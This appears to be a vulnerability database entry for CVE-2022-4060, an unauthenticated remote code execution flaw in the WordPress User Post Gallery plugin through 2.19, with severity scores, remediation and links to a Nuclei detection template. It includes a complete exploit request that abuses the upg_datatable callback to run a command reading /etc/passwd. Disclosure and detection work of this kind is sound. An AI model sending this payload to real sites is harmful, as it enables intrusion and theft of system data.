| Title | WordPress User Post Gallery <=2.19 - Remote Code Execution |
|---|---|
| Author | theamanrawat |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site. |
| Remediation | Update to the latest version of the User Post Gallery plugin (>=2.20) to mitigate this vulnerability. |
| CVSS Score | 9.8 |
| EPSS Score | 0.91121 |
| CVE ID | CVE-2022-4060 |
| CWE ID | CWE-94 |
| Tags | cve cve2022 unauth wpscan rce wordpress wp-plugin wp wp-upg odude vkev vuln |
WordPress User Post Gallery plugin through 2.19 is susceptible to remote code execution. The plugin does not limit which callback functions can be called by users, making it possible for an attacker execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
GET /wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:head+-1+/etc/passwd:NULL:NULL HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-4060.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-4060.pcap
N/AN/A